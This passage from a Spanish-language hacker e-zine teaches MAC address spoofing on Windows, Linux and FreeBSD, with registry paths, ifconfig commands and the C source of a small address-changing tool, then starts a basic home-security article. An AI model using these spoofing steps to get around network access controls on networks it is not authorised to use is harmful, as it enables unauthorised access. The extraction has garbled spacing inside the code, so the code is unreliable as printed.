una referencia sobre sistemas 2000 o NT.
vamos al registro de configuracin de la siguiente ruta:
HKEY_LOCAL_MACHINE \ S ys tem \ C u r r e n tControlSet \ S e rvices \ Class \ N e t
Es ac donde encontraremos una seccin de llaves tales como 0000,0001,0002, etc. y decimos que los #
son los id de la tarjeta de red ( nic). Por lo tanto para intentar cambiar nuestro mac de nuestra tarjeta
tendramos que entrar hacer unos doble click sobre los "#00 blabla" y empezar a fijarse muy bien en el
DriverDesc, que este el que contiene la descripcin de toda la interfaz de red, con lo consiguiente
agregas un nuevo string value con el nombre NetworkAddress= ####blabla todo el numero en
hexadecimal, una ves realizados todos los cambios es preciso deshabilitar y rehabilitar la tarjeta de
red, para que as los cambios sufran efecto y la funcion NdisReadNetworkAddress los lea...
El directorio donde encuentr as las llaves en windows va cambiando segn las estructur a de los distros
por ejemplo como dimos a conocer en 98 se encuentr a en:
HKEY_LOCAL_MACHINE \ S ys tem \ C u r r e n tControlSet \ S e rvices \ Class \ N e t
Mientras que en sistemas 2000 o NT por ejemplo la encontramos dentro de la siguiente ruta de
registro:
HKEY_LOCAL_MACHINE \ SYSTEM \ C u r re n tControlSet \ Control \ Cla ss \
Simple. bonito y barato xDD y a mano he. bueno como se dan cuenta no es ninguna ciencia realizar un
cambio a mano de un numero de mac en windows, ahora pasramos a ver ya analizar alguna
herramienta que nos haga la tarea automatizada y mas fcil, rpido, etc...
2.1- Herrami e n t a s para wind o w s
Bsicamente nos vamos a centrar, en la herramienta llamada SMAC. Dicha herramienta la puedes
encontrar en http://www.klcconsulting.net/smac/.
SMAC es una utilidad que permite a usuarios cambiar la direccin de mac para casi cualquier tarjeta
de red (NIC) sobre sistemas 2000, XP, y 2003 sistemas de Servidor, independientemente de si la

fabricacin permite esta opcin o no.


SMAC fue desarrollado y basado en la investigacin de un consultor de seguridad ( Kyle Lai ) Este
software naci como un instrumento de pruebas de vulnerabilidad de seguridad para la direccin de
mac, en pocas palabras un instrumento de solucin de red. Pero que tiene variados usos.
Para mayor informacin dirigirse a:
http://www.klcconsulting.net/smac/
3.0.- Mac spoofi n g en linux
El cambio de mac en linux es sumamente fcil, y daremos la explicacin con el comando que trae
nuestro querido linux que es el "ifconfig", as que bueno ac nos vamos con la descripcin en
profundidad.
Primero abres una consola como root por supuesto y ejecutas "ifconfig". Esto nos dar una salida
parecida a esta que se muestra a continuacin:
[root@cdtboys root]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:7D:FB:F3:E3
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3016 errors:0 dropped:0 overruns:0 frame:0
TX packets:3151 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100
RX bytes:1072450 (1.0 Mb) TX bytes:303175 (296.0 Kb)
Interrupt:5 Base address:0xf000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:116 errors:0 dropped:0 overruns:0 frame:0
TX packets:116 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7180 (7.0 Kb) TX bytes:7180 (7.0 Kb)

ppp0 Link encap:Point- to-Point Protocol


inet addr:164.77.241.99 P-t-P:200.72.3.103 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:2485 errors:0 dropped:0 overruns:0 frame:0
TX packets:2620 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:985860 (962.7 Kb) TX bytes:213615 (208.6 Kb)
Despus de ver esto, como se fijan en "eth0" esta nuestra tarjeta de red y la descripcin de ella ( Link
encap:Ethernet HWaddr 00:E0:7D:FB:F3:E3 ) con su numero de mac ah incluido. Bueno ahora que
aremos, lo primero que k tenemos que tener en cuenta es hacer el cambio con la tarjeta de red abajo,
para esto tienes dos opciones, dejarla abajo va extensin del mismo comando ifconfig (ifconfig eth0
down) o hacerlo con una herramienta como MAC Changer.
Bueno un ejemplo con el comando ifconfig seria algo as:
-.primero ponemos down nuestra NIC
[root@cdtboys root]# ifconfig eth0 down
-.luego verificamos si esta abajo
[root@cdtboys root]# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:116 errors:0 dropped:0 overruns:0 frame:0
TX packets:116 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7180 (7.0 Kb) TX bytes:7180 (7.0 Kb)
Como vemos bajamos la NIC y ahora nos tiramos con el cambio de MAC y esto lo hacemos de la
siguiente manera:
[root@cdtboys root]# ifconfig eth0 hw ether 00:30:CA:52:0A:F0

Luego de esto verificamos y el seteo de la siguiente forma


[root@cdtboys root]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:30:CA:52:0A:F0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3469 errors:0 dropped:0 overruns:0 frame:0
TX packets:3650 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1149673 (1.0 Mb) TX bytes:346131 (338.0 Kb)
Interrupt:5 Base address:0xf000
Como vemos cambiamos nuestro numero de MAC, ahora solo tenemos que ponerla online de la
siguiente forma:
[root@cdtboys root]# ifconfig eth0 up
y vemos que todo esta ok, ahora solo nos falta comprobar la conexiones y conectarnos y tamos listos con
nuevo numero de MAC...
3.1.- Herrami e n t a s para linux
Bueno primero vamos a nombrar a MAC Changer, vamos a ser una breve descripcin de esta
herramienta y despus nos referiremos al programilla de nuestro amigo dr_fdisk^ de raza mexicana, el
cual nos autorizo para que nombrra mos dicho cdigo y programa ac en este apartado, un saludo
desde ac y nos lanzamos xDD...
MAC Changer:
Dentro de las utilidades que trae esta herramienta ac les nombro algunas:
Juego direccin de MAC especifica de un interfaz de red

Muestre la lista de MAC de un vendedor para escoger


Tira y pone nmeros de MAC al azar
Etc, etc...
Algunos de sus usos posible, en la web dice todo uso posible que su mente decida darle xDD. Para que
vean que el programa no te limita a nada, jejeje. Bueno sin mas especificaciones ya que si quieres
verlas a fondo te puedes dirigir a la web de dicha herramienta que pego a continuacin.
Sitio de descarga:
http://www.alobbs.com/modules.php?op=modload&name=macc&file=index
Bueno ahora hablaremos del programilla codeado por nuestro amigo dr_fdisk^, es un cdigo limpio
programado en c y que sirve y puede ser compilado en cualquier clase de Linux, es muy portable y de
no mucha ciencia, pero si de harta efectividad.
El programa lleva por nombre MACFUCK y ac se los dejo.
/*
This simple progra m cha ng e s the mac addr e ss of an interfac e for linux
code by dr_fdisk
dr_fdisk@raza- mexic a n a . o r g
w w w .ra z a -m e x i c a n a .o rg
*/
#includ e <stdio.h>
#includ e <net/if.h>
#includ e <sys/ioc tl.h>
char mac[6];
char maca[17];
struc t ifreq interfa z;
int i,eae a;
void main(i nt argc , char *argv[])
{
if (argc<3){
printf("MACFUCK by dr_fdisk^ (dr_fdisk@raza- mexic a n a. or g) \ n");
printf("================================================= \ n");
printf("uso:%s interfaz mac- addre ss \ n",argv[0]);
printf("ex:%s eth0 AA:AA:AA:AA:AA:AA \ n",argv[0]);
exit(0);}
if (!(2[argv[2]] == ':' && 5[arg v[2]] == ':' && 8[argv[2]] == ':' &&
11[arg v[2]] == ':' && 14[arg v[2]] == ':' && strlen( ar gv[ 2]) == 17 )){
printf("La Mac que ingre so no es valida! \ n");
printf("Ingre sal a en este form at o: XX:XX:XX:XX:XX:XX\n");exit(0);}
for(i = 0; i < 6; i++) i[mac] = (char)(strt o u l( ar gv[2] + i*3, 0, 16) & 0xff);

eaea = socke t(A F_INET, SOCK_DGRAM, 0);


if (eae a < 0){
perror("socket");
exit(1);}
sprintf(i nt e r f a z.ifr_na m e, "%s",argv[1]);
if (ioctl(e a e a, SIOCGIFHWADDR, &interf a z) < 0){
perror(int e r f a z.ifr_na m e );
exit(1);}
for(i = 0; i < 6; i++) i[int erfa z.ifr_h w a d dr. sa_dat a] = i[mac];
if (ioctl(e a e a, SIOCSIF HWADDR,&int e rf a z) < 0){
printf("No pued o cambia r la mac, revisa si %s, esta levant ad a \ n",argv[1]);
perror(int e r f a z.ifr_na m e );
exit(1);}
printf("EAEA! \ nL a MAC actua l es: "); for (i = 0; i < 6; i++){
printf("%2.2x:", i[inte rf a z.ifr_h w a d d r. sa_da t a] & 0xff);}
printf("\n");
close( e a e a );
}
Bueno esto lo compilamos con su debido gcc, de la siguiente forma:
[root@cdtboys conan]# gcc macfuck.c -o macfuck
Luego le damos
[root@cdtboys conan]# ./macfuck
MACFUCK by dr_fdisk^ (dr_fdisk@raza- mexicana.org)
=================================================
uso:./macfuck interfaz mac- address
ex:./macfuck eth0 AA:AA:AA:AA:AA:AA
[root@cdtboys conan]#
Como ven da la explicacin de como se debe poner el numero de MAC y todo, el resto lo hace el
programa automticamente.
Desde aqu muchas gracias al mano dr_fdisk^ por permitirnos nombrar su cdigo y su programa en
nuestra e-zine y tambin un saludo cordial a los manos de raza mexicana.
Con esto voy terminando mi parte de este texto y a continuacin los dejo con nuestro mano y nuevo
integrante CMxS que pasa explicar el cambio de MAC en sistemas BSD.
4.0.- Mac spoofi n g en BSD
Buenas, soy CMxS, el nuevo integrante de CDT, esta es mi primera aparicin en la e-zine, en esta
ocasin les hablar brevemente del cambio de MAC en FreeBSD.
Bueno, a trabajar, este es mi sistema:
> uname -a
FreeBSD 4.9-RELEASE #4: Fri Jan 2 19:23:43 CST 200
[email protected]:/usr/obj/usr/src/sys/CMXS i386
> ifconfig
ed0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet6 fe80::200:21ff:fe64:ae7%ed0 prefixlen 64 scopeid 0x1
inet 192.168.25.4 netmask 0xffffff00 broadcast 192.168.25.255
ether 00:00:21:6a:0b:e5 <---------------------------------- Esta es la MAC actual de nuestra NIC
lp0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> mtu 1500
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
Ahora procedamos:
> su
Password:
BSDBox#
Primero es recomendable que se haga esto con la tarjeta de red offline
BSDBox# ifconfig ed0 down
Luego procedemos a cambiar la MAC tambin con el comando ifconfig:
BSDBox# ifconfig ed0 lladdr 01:02:03:04:05:06
Ahora verificamos el cambio:
BSDBox# ifconfig
ed0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 1500
inet6 fe80::200:21ff:fe64:ae7%ed0 prefixlen 64 scopeid 0x1
inet 192.168.25.4 netmask 0xffffff00 broadcast 192.168.25.255
ether 01:02:03:04:05:06 <---------------------------------- La direccion MAC fue cambiada
lp0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> mtu 1500
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet 127.0.0.1 netmask 0xff000000
Ahora como ya sabemos que el cambio fue realizado, procedemos a conectarnos de nuevo a la red, en mi
caso tuve que reiniciar mi switch, recuerden que los switch's guardan tablas con las direcciones MAC
para que el trafico sea fluido hacia cada host, lo mismo puede suceder si se conectan a un servidor
DHCP.
Ahora ponemos la tarjeta online:
BSDBox# ifconfig ed0 up
Nos toca comprobar si ya tenemos conexin, en caso que no, se puede hacer otra cosa: reiniciar todos los
servicios del sistema, de esta manera obtenemos de nuevo un ip del servidor DHCP (si lo usan):
BSDBox# shutdown now
*** FINAL System shutdown message from [email protected] ***
System going down IMMEDIATELY
Jan 14 16:08:02 BSDBox shutdown: shutdown by CMxS:
Shutting down daemon processes:.
Saving firewall state tables:.
Jan 14 16:08:04 BSDBox syslogd: exiting on signal 15
Aqu se pregunta la direccin de una shell, presionamos solamente enter para usar /bin/sh.
Enter full pathname of shell or RETURN for /bin/sh:
Ahora salimos con exit o ^D, para iniciar los servicios del sistema...
# exit
Skipping disk checks ...
Doing initial network setup:.
ed0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet6 fe80::200:21ff:fe64:ae7%ed0 prefixlen 64 scopeid 0x1
inet 192.168.25.4 netmask 0xffffff00 broadcast 192.168.25.255
ether 01:02:03:04:05:06
Ahora a comprobar la conexin con la red.
Bueno, eso es todo de mi parte,, por ahora... xDD.
Saludos,
CMxS
PGPKey: 0x6313BEBB
5.0.- Palabras al cierre
Ac estamos dndole termino a este texto, pero antes de hacerlo tenemos que hacer algunas referencia
a diferentes sitios web que nos sirvieron mucho a la hora de hacer su previa investigacin, que fueron
los siguientes:
http://www.net.princeton.edu/enetAddress.howto.html
http://www.kriptopolis.com
http://www.drizzle.com/~aboba/IEEE
http://www.klcconsulting.net/smac
http://www.alobbs.com/modules.php?op=modload&name=macc&file=index
http://standards.ieee.org/regauth/oui/oui.txt
http://archives.neohapsis.com/archives/vuln- dev/2000- q1/0517.html
Bueno desde ya muchas gracias por leer este texto nos despedimos con nuestro cumpa CMxS hasta la
prxima y que sigan disfrutando de la e-zine...
Seguridad en entornos home
Por: Leon177
Mail de contact o: piso [email protected]

Nax a todos los amantes de la Informtica, espero que lo tratado en este texto sirva para que tomen
conciencia de las cosas que vivimos y para que tengan ms ideas, para proteger sus sistemas, y
tambin por que no saber las consecuencias de tener un sistema desprotegido y a la espera de ser una
victima sabrosa para los atacantes.

Este texto naci en una noche donde le pregunte a mi amigo bitburner sobre que poda tratar, lo mas
practico me dijo, podra ser Seguridad Casera, pues bien manos, este texto tratara sobre la seguridad
en un ordenador de hogar, estar dividido as que la otra parte seguramente saldr en la prxima
ezine, hago esto para trata r mas a fondo los temas.

Bien, antes de comenzar les dar una lista con los tem a tratar y sus derivaciones, para que
este mejor organizado...

C:\InetPub \ w wwroot>
+CONTENIDOS
|
|- ------> -Introduccin <DIR>
|- ------> -Firewall <DIR>
|- ------> -Puertos <DIR>
|- ------> -Antivirus <DIR>
|- ------> -Correos <DIR>
|- ------> -Contraseas <DIR>
|- ------> -Respaldos <DIR>
|- ------> -Paginas Web maliciosas <DIR>
|- ------> -Spywares & Spam <DIR>
|- ------> -Virus <DIR>
|- ------> -Programas de encriptacin <DIR>
|- ------> -Lista de correo <DIR>
|- ------> -Enlaces de inters <DIR>
|- ------> -Cerebro + neuronas <DIR>
|- ------> -Probar tu ordenador <DIR>
|- ------> -No alcanza <DIR>
|- ------> -Despedida <DIR>

Introdu c c i n:

Estoy ac escribiendo esto para darles una idea de como mantener nuestro ordenador seguro, en estos
das sabemos que el crimen ciberntico no es nada del otro mundo, por as decirlo, ahora cualquier
maquina conectada a la red es un blanco para cualquier intruso, puede ser desde un intruso avanzado
hasta alguien que solo se divierte, generalmente si es alguien avanzado no creo que quiera tus datos, si
no, lo que quiere es utilizar tu ordenador como central de ataque, mientras que los otros menos
avanzados son los mas peligrosos, ya que, no les interesa nada y destruyen todo a su paso.

El quebrar la seguridad no es difcil si dispones de herramientas y tiempo, lo que es un desafi es


ponerle fin a las penetraciones a nuestro ordenador, por eso en este texto dar a conocer algunos tipos

De tcnicas y software a utilizar para poder mantenernos seguros y hacerles el trabajo mas difciles a
los atacantes.

Las cosas a perder en nuestro sistema pueden ser desde trabajos, mp3, fotos, programas, etc, lo cual
nosotros no queremos perder por culpa de un intruso o virus que infecte nuestro ordenador y as perder
todo. No queremos acceso no autorizado, por eso hablare sobre polticas de seguridad para tener en
cuenta las amenazas que existen en la red...

Todo esto estar basado para aplicar en un ordenador de hogar...

El problema ms grave eres t, ya que eres el administrador del sistema y eres quin tiene el poder
para frenar las intrusiones. El admin debe saber que software utilizar para mantenerse seguro y los
parches a aplicar, con este texto dar ideas para que puedan aplicar.

La realidad es que hay mucha gente desinteresada en el tema de la seguridad pero cuando penetran en
su sistema saben del hoyo en el que estn metidos, por que, perder informacin no es nada agradable,
tambin va para todas aquellas personas que mandan post a foros pregunta ndo como proteger su
sistema.

Bueno empecemos con este texto y a darle a la lectura ya que es lo nico que se puede
hacer, sumar conocimientos (lectura) En este articulo se trata r an temas como firewalls, puertos,
antivirus, contraseas, correo.

Fire wa ll:

0k, para empezar a proteger nuestro sistema tenemos que tener en claro que la primera herramienta
de seguridad a tener es un Firewall, este programa es quien nos salvara de muchos intentos de

Penetracin a nuestro ordenador, por eso recomiendo que descarguen un firewall.

Vamos a ver como funciona un firewall, cuales recomiendo y donde descargarlos...

Un firewall tiene muchas utilidades, este controla la entrada y salida de paquetes de nuestro
ordenador, todos estos programas nos dan la posibilidad de configurarlos, he aqu una ventaja, ya que
podemos dar acceso a los programas que nosotros queremos y bloquear los que no deseamos, tambin al
detectarse una posible intrusin, salta la alarma avisando que puertos estn atacando, ip del atacante,
etc.

Estas herramientas ya han tomado un lugar en la mayora de los ordenadores de hogar, esto se debe a
que las nuevas conexiones como adsl, al estar conectadas casi todo el da, estamos dejando el ordenador
en manos de atacantes, por eso si tomamos medidas de seguridad estaremos impidiendo que accedan a
nuestro ordenador o hacerles el trabajo mas difcil...

El firewall (pared de fuego) es un mediador, o sea, tenemos nuestro ordenador- firewall- Internet, lo que
hace es controlar la entrada y salida de datos por lo que esta en constante monitoreo.

Bueno, el firewall tambin es un programa que puede frenar troyanos o intrusos de cualquier lado,
como sabemos, cuando estamos conectados, siempre en cada momento estamos enviando y recibiendo
paquetes de informacin, el firewall lo que hace es examinarlo y decidir si cumple con algunas reglas,
para dejarlos seguir el camino. Recuerda que bloquea, te deja controlar la conexiones a tu maquina y tu
tienes todo el control sobre las aplicaciones/programas que tienen acceso a Inet.

Uno de los firewalls mas conocidos y aceptados por los usuarios de hogar es el Kerio Personal Firewall
(KPF 4.0.10) es su ultima versin, es totalmente gratis (ventaja) lo podemos descargar de:

http://www.aclantis.com/downloads- file-1363-details- Kerio_Personal_Firewall_4.0.2..html


http://www.kerio.com/kpf_download.html (oficial)

Algunos de los firewalls ms conocidos son:

Panda Antivirus Platinum: http://www.pandasoftware.es/activescan/activescan- es.asp


ZoneAlarm lo puedes descargar de: http://www.zonelabs.com/store/content/home.jsp
Sygate Personal Firewall: http://smb.sygate.com/products/spf/spf_ov.htm
Outpost firewall: http://www.protegerse.com/outpost/download/outpostfree.html
Norton Personal firewall 2001 3.0: http://www.softdownload.com.ar/programas/Npf30_trial.exe
Tiny Personal Firewall, sta es una herramienta muy til ya que para ataques contra nuestro PC:
http://www.tinysoftware.com/tiny2/protected/tpf- 5.00.1210.exe
Trojan Defense Suite, muy bueno, ya que puede detectar y eliminar troyanos, virus, puedes cerrar
puertos, avisa si alguien te scanea, recomendado.
http://www.diamondcs.com.au/tds/downloads/tds3setup.exe

No creo que tengan problemas para instalar y configurar alguno de estos programas ya que tienen
asistentes de configuracin y con un par de clicks tendr instalado su firewall...

Sigamos explicando que utilidades tiene este software:

No solo esta preparado para frenar ataques si no que tambin podemos cerrar los puertos de nuestro
ordenador teniendo as controlado nuestro PC, sirve para que los intrusos no usen nuestro PC como
central de ataque, tambin pueden filtrar los datos de nuestro ordenador que intentan salir.

En muchos foros me di cuenta que pregunta n si se pueden tener dos firewalls instalados en el
ordenador, la respuesta es: si, se puede, pero no creo que sea necesario, ya que en vez de hacer ms
seguro el ordenador, estaremos obteniendo ms problemas, por lo que les recomiendo que no instalen 2
firewalls en su PC.

Tambin me encontr con la pregunta de: Que firewall es mejor para frenar ataques?, pues hay varios
que tienen grandes ventajas sobre otros, pueden probar el zonealarm que es uno de los mas utilizados
por los usuarios hogareos ya que es sencillo y efectivo, pero sabemos que tira muchas alarmas falsas.
Por eso digo que prueben algunos y que se queden con el que mas les guste pero no se
descarguen uno y listo, prueben otros y vean que onda. Podemos configurarlos dependiendo de como
nosotros queramos, o sea, definir el tamao de paquete, direcciones IP, etc...

Aunque tengamos un firewall instalado en nuestro ordenador no quiere decir que vamos a estar 100%
seguros y libres de intrusiones, ya que es posible saltarse la seguridad de estos, pero hay pocas
posibilidades, porque un usuario experto no creo que quiera entrar en un ordenador de usuario y joder,
pero siempre estn los que molestan...

Firewall Barrera (Cortafuegos, Pared de fuego)


Controla el trfico
tiles para seguridad y proteccin
Bloquea programas - Examina paquetes
Controla la configuracin de cada paquete y bloquea el trfico pesado.

Puertos:

Bien, para empezar les digo que los puertos como el 21, 80, 23, 25 (comunes, estndares) son todos
puertos TCP- IP, mientras que los puertos mas grandes podemos utilizarlos para cualquier aplicacin
Si tenemos programas corriendo en nuestro servidor pero no lo estamos utilizando, debemos cerrar el
puerto, ya que, no sirve a nosotros, pero al atacante si, ya que puede lograr sacar informacin de ese
puerto o hasta lograr la intrusin a travs de el.

Si no tenemos mas de una maquina conectada en nuestro hogar no es necesario tener configurado el
sistema para compartir archivos y impresoras, por eso vamos a desactivar Cliente de Redes de
Microsoft y Compartir archivos y impresoras cerrar el puerto de Netbios si no lo utilizamos, ya que
puede causar problemas, los puertos que utiliza Netbios son el 137-138-139.

Tenemos que saber exactamente que puertos estamos utilizando para as mejorar nuestra seguridad,
ya que un atacante puede utilizar este recurso para acceder a nuestro ordenador. Si queremos estar
mas seguros existen programas que cierran el puerto deseado por nosotros, algunos de estos son:

Portblocker: es sin duda uno de los programas ms utilizados para cerrar puertos
Port Tunnel: redirecciona puertos http://www.magicnotes.com/steelbytes/PortTunnel_ESP.zip

Antiviruz:
La palabra lo dice todo, existen muchos programas antivirus para detectar virus en nuestra
maquina, archivos descargados, virus en el correo electrnico (archivos adjuntos). Gracias a estos
programas estamos seguros de no recibir cualquier intrusin de virus, ya que si lo mantenemos
actualizado (no digo diariamente pero si semanalmente), estaremos tranquilos de que no podrn entrar
a nuestro ordenador.

Estos programas son la base de nuestra seguridad ya que da a da gran cantidad de virus o variantes
de estos, salen a la luz para infectar miles y millones de computadoras.

Un antivirus puede ser configurado para escanear el correo electrnico, esta es una de las ms
importantes funciones, al igual que el scan de archivos descargados de Internet. Cuando digo darle
scan al correo lo digo porque la mayora de los ordenadores se infecta mediante el correo electrnico por
culpa de no estar informados de estos.

Si nos interesa mantener nuestro ordenador estable, tendremos que tener en cuenta estas medidas de
seguridad y muchas mas...

Los antivirus nos dan tranquilidad y gran proteccin hasta un cierto punto, ya que, podemos decir, que
estos programas tienen una especie de base de datos, donde guardan la informacin de los virus que
pueden reconocer, ms comnmente llamada firmas, si no actualizamos el programa, no servir de
nada tenerlo, por eso debemos ponernos a pensar que no es difcil mantener nos alejados de los virus, la
mayoria de los fabricantes de antivirus, dan acceso gratis a la descarga de la actualizacin, por lo que
pongmonos a pensar de lo fcil que es ir manteniendo nuestro ordenador seguro, o al menos de los
virus.

Ac dejo algunos links donde pueden informarse sobre el tema:

http://www.mcafee.com/
http://www.pandasoftware.es/microsoft/

Tambin debemos tener un anti- troyano para ms seguridad, uno de los ms conocidos es The Cleaner,
que lo pueden bajar de http://www.softonic.com/ie/7630

Correo:

Estamos en una parte del texto donde voy a comentarles que la mayora de los desastres que ocurren
mediante el correo electrnico.

Por nuestro correo podemos recibir mail de personas que no conocemos, o si, donde mandan archivos
adjuntos con nombres los cuales llaman la atencin, y como nosotros somos curiosos, lo abrimos sin

Darle un scan o investigar de donde viene dicho correo ni mas ni menos infectamos nuestro ordenador
con un virus, troyano, sniffer, keylogger, etc.

Los virus informticos se reenvan con una velocidad muy grande donde pueden infectar miles y miles
de ordenadores en pocos minutos.

Uno de los problemas comunes es que en Windows tenemos una opcin donde nos deja ocultar las
extensiones de textos, programas, etc, gracias a esta configuracin muchos ordenadores estn dejando
camino libre para virus y dems cosas maliciosas, ya que el usuario puede ver que el archivo adjunto
del mail diga estamos_aca.TXT.vbs o tambin podemos encontrar .mpg.exe y gran variedad, as nos
infectamos de una manera la cual podemos evitar sacando la opcin de ocultar extensiones.

Les recomiendo que los mail recibidos de desconocidos, los descarten, al igual los que en el texto estn
escritos en ingles, y es muy raro que un amigo te escriba en ingles y te mande un archivo adjunto, si lo
recibes de una cuenta conocida tambin, por que los virus estn programados para reenviarse a las
listas de correo de las victimas y es as como logran expandirse con gran velocidad, por otra parte,
tengan cuidado con extensiones .exe .vbs y .scr.
Otro de los temas importantes es el mirar el correo en la universidad, colegio, ciber, etc. Cuando
abrimos nuestro correo, por ejemplo Hotmail, en alguno de estos lugares, debemos cerrar sesin al
irnos ya que pueden entrar sin poner los datos y usar nuestra cuenta.

Contras e a s:

Llegamos a la parte ms difcil de que un usuario entienda lo que puede causar un password fcil-dbil
y estupido...

Es verdad que si creamos un password con muchos nmeros y letras nos ser difcil de recordar, pero
ser peor los daos recibidos cuando un atacante logre obtener nuestra contrasea, la cual da acceso a
nuestra informacin, correo electrnico, etc.

Los password son para que el individuo que tiene una cuenta logre acceder a ella y configurar lo que
desea, borrar, y crear, por lo que si tenemos un password fcil de adivinar o descifrar estaremos
perdidos.

Ahora les explicare como podemos crear contraseas las cuales nos sean seguras- efectivas y si puedo
que sea de recordar sin ningn problema...

Primero y principal les digo que se vayan olvidando de su aniversario, nombre de la mascota, tampoco
que sea dios, sexo, amor, 1234, tu nombre, telfono ni nada de eso, porque ser fcil para un intruso
dar con tu contrasea.

Si es posible no la escribas en ningn lado donde se pueda ver, encontrar, etc, si lo haces tienes como
responsabilidad de buscar un lugar seguro donde escribirla y guardarla, pero nada de pegar un papel

En el monitor, ni abajo del teclado o que sea visible... Bueno, les voy a dar algunos ejemplos para que
les quede claro la utilizacin de una contrasea segura:

Trata de elegir una contrasea la cual mezcle maysculas, minsculas y nmeros, esto seria lo mejor y
creo que no tendrs problemas en recordar y si puedes poner algn signo como _ (guin abajo) o #
(gato), ser mejor, ya que es difcil que un atacante ponga un programa (bruteforce) a correr con letras
en maysculas minsculas nmeros y signos, ya que tardara demasiado en dar con la pass correcta.

Un password difcil de sacar seria J1_WwMiILo=_X jeje pero dirn que estoy loco, porque no

Recordaran eso nunca en sus vidas, pues haber que ideamos para acordarnos la pass y que a su vez
sea difcil...

Un password seguro debe tener como mnimo 8 caracteres, y no debemos usar el mismo para todas
nuestras cuentas que tengan password ya que si obtienen esa, podran probar con otra, y as acceder a
ms cuentas.

Otras maneras de hacer contraseas difciles de sacar pero fciles de recordar es as:

M1p4ss = mipass c0ntr4534 = contrasea, 3st0y3nc454 = estoyencasa

Se tapan algunas letras con nmeros

14c0ntrase_AM = iacontrasea m = contrasea mia

Se mezclan las palabras, se comienza por 4 primeros caracteres como nmeros, y 2 ltimos como
maysculas, caracteres raros cubiertos con _ (guin abajo) u otro smbolo.

Buenas tcnicas para recordar las contraseas siendo difciles de descifrar por un programa
y de adivinar para una persona.

Bueno para que quede claro, ac les dejo unos Tips para recordar como deben asegurar sus
Cuentas:
Nunca pongas claves con solo palabras
No poner claves que estn relacionado con vos
Tampoco que sean de tipo 1234
Acordate de no usar las mismas claves para tus cuentas

Respal d o:

Es importante mantener un respaldo de nuestro sistema mas conocido como Backup ya que si logran
penetra r nuestra seguridad o sistema, tendremos muchas posibilidades de perder todo lo que tenemos
en el sistema.

